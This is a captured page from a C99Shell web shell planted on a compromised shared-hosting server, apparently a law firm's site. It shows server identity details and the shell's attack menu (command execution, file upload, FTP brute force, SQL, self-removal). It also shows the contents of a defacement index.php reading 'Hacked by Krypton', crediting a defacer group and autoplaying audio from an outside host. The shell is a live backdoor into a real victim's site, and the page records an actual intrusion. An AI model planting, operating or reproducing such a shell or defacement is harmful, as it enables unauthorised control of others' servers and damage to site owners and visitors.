!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/mophlawyer.com/js/examples/   drwxr-xr-x
Free 238.43 GB of 981.82 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (7.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<html>

<head>
    <title>&#1203;&#824;&#1202;&#824;&#1203; Nothing &#1203;&#824;&#1202;&#824;&#1203;</title>
    <link REL="SHORTCUT ICON" HREF="https://upload.wikimedia.org/wikipedia/commons/thumb/b/bb/Broken_heart.svg/2500px-Broken_heart.svg.png">
    <meta content='Hacked By Krypton' name='description' />
    <meta content='Hacked By Krypton' name='keywords' />
    <meta content='Hacked By Krypton' name='Abstract' />
    <meta name="description" content="Hacked by Krypton">
    <meta name="keywords" content="Krypton, Hacker, Krypton, Hacked, Indonesia Defacer Tersakiti">
    <meta name="googlebot" content="index,follow" />
    <meta name="robots" content="all" />
    <meta name="robots schedule" content="auto" />
    <meta name="Copyright" content="Krypton" />
    <meta contact='http://facebook.com/mfwithme' />
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Gloria+Hallelujah&display=swap" rel="stylesheet">
    <style type="text/css">
        body {
            cursor: url("http://i.imgur.com/Cln0zMc.png"), default
        }
        img {
            opacity: 0.8;
        }

        img:hover {
            opacity: 10;
        }
    </style>

<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
</head>
<script type="text/javascript">

    var snowmax = 35
    var snowcolor = new Array("#AAAACC", "#DDDDFF", "#CCCCDD", "#F3F3F3", "#F0FFFF")
    var snowtype = new Array("Arial Black", "Arial Narrow", "Times", "Comic Sans MS")
    var snowletter = "*"
    var sinkspeed = 0.6
    var snowmaxsize = 22
    var snowminsize = 8
    var snowingzone = 1

    // Do not edit below this line
    var snow = new Array()
    var marginbottom
    var marginright
    var timer
    var i_snow = 0
    var x_mv = new Array();
    var crds = new Array();
    var lftrght = new Array();
    var browserinfos = navigator.userAgent
    var ie5 = document.all && document.getElementById && !browserinfos.match(/Opera/)
    var ns6 = document.getElementById && !document.all
    var opera = browserinfos.match(/Opera/)
    var browserok = ie5 || ns6 || opera

    function randommaker(range) {
        rand = Math.floor(range * Math.random())
        return rand
    }

    function initsnow() {
        if (ie5 || opera) {
            marginbottom = document.body.clientHeight
            marginright = document.body.clientWidth
        }
        else if (ns6) {
            marginbottom = window.innerHeight
            marginright = window.innerWidth
        }
        var snowsizerange = snowmaxsize - snowminsize
        for (i = 0; i <= snowmax; i++) {
            crds[i] = 0;
            lftrght[i] = Math.random() * 15;
            x_mv[i] = 0.03 + Math.random() / 10;
            snow[i] = document.getElementById("s" + i)
            snow[i].style.fontFamily = snowtype[randommaker(snowtype.length)]
            snow[i].size = randommaker(snowsizerange) + snowminsize
            snow[i].style.fontSize = snow[i].size
            snow[i].style.color = snowcolor[randommaker(snowcolor.length)]
            snow[i].sink = sinkspeed * snow[i].size / 5
            if (snowingzone == 1) { snow[i].posx = randommaker(marginright - snow[i].size) }
            if (snowingzone == 2) { snow[i].posx = randommaker(marginright / 2 - snow[i].size) }
            if (snowingzone == 3) { snow[i].posx = randommaker(marginright / 2 - snow[i].size) + marginright / 4 }
            if (snowingzone == 4) { snow[i].posx = randommaker(marginright / 2 - snow[i].size) + marginright / 2 }
            snow[i].posy = randommaker(2 * marginbottom - marginbottom - 2 * snow[i].size)
            snow[i].style.left = snow[i].posx
            snow[i].style.top = snow[i].posy
        }
        movesnow()
    }

    function movesnow() {
        for (i = 0; i <= snowmax; i++) {
            crds[i] += x_mv[i];
            snow[i].posy += snow[i].sink
            snow[i].style.left = snow[i].posx + lftrght[i] * Math.sin(crds[i]);
            snow[i].style.top = snow[i].posy

            if (snow[i].posy >= marginbottom - 2 * snow[i].size || parseInt(snow[i].style.left) > (marginright - 3 * lftrght[i])) {
                if (snowingzone == 1) { snow[i].posx = randommaker(marginright - snow[i].size) }
                if (snowingzone == 2) { snow[i].posx = randommaker(marginright / 2 - snow[i].size) }
                if (snowingzone == 3) { snow[i].posx = randommaker(marginright / 2 - snow[i].size) + marginright / 4 }
                if (snowingzone == 4) { snow[i].posx = randommaker(marginright / 2 - snow[i].size) + marginright / 2 }
                snow[i].posy = 0
            }
        }
        var timer = setTimeout("movesnow()", 50)
    }

    for (i = 0; i <= snowmax; i++) {
        document.write("<span id='s" + i + "' style='position:absolute;top:-" + snowmaxsize + "'>" + snowletter + "</span>")
    }
    if (browserok) {
        window.onload = initsnow
    }


    var play = false;
    $(document).ready(function () {
        var myAudio = document.getElementById('music');
        if (myAudio.duration > 0 && !myAudio.paused) {

            console.log('woke !')
            play = true
        } else {
        var audio = document.createElement("AUDIO");
        document.body.appendChild(audio);
        audio.src = "bsound.mp3";
        audio.autoplay = "";
        document.body.addEventListener("mousemove", function () {
            console.log('play mati')
            if (!play) {
                console.log('play sudah')
                play = true;
                $('#music').remove()
                audio.play().catch(function (error) {
                    play = false;
                });
            }
        })
        }
    })
</script>

<body bgcolor="black">
    <audio id="music" loop autoplay="" src="https://phbcoop.com/broken.mp3"></audio>
    <iframe src="https://phbcoop.com/broken.mp3" allow="autoplay" style="display:none" id="iframeAudio">
    </iframe>
    <center><img src="https://i.postimg.cc/ZRQgn1Yc/e3ed7d39-fe4e-42ed-b9d3-c68991bee7d0.jpg" height="300"
            width="300"><br>
        <font color="lime" face="Gloria Hallelujah" size="6">
            Hacked by Krypton<br></font>
            <font color="red" face="Gloria Hallelujah" size="4">
                Mencintai adalah salah satu seni menyakiti diri sendiri, karena sejatinya Cinta hanya luka yang tertunda.<br>
                Dan obat terbaik memanglah waktu, bukan orang baru :)<br>
                
            </font>
            <font color="lime" face="Gloria Hallelujah" size="3">
                ~We are Cyber TeamRox~
                <p> Zeeshan Haxor - M1S74KE - Waleed jutt - Mr.Ghost - D@rkCoder -
                    Dr.S4mom <br> black hell ahmed - Krypton - EvilCl0wn - Cloudy Virus - Harith101 -
                    CrYpt0 - Clinkz48 - ./N30F0RC3 - ProPagAndA
                    </b>
                </p>
            </font>
            <font color="lime" face="Gloria Hallelujah" size="5">- Salam dari jiwa tersakiti v -</font>
    </center>
</body>

</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.026 ]--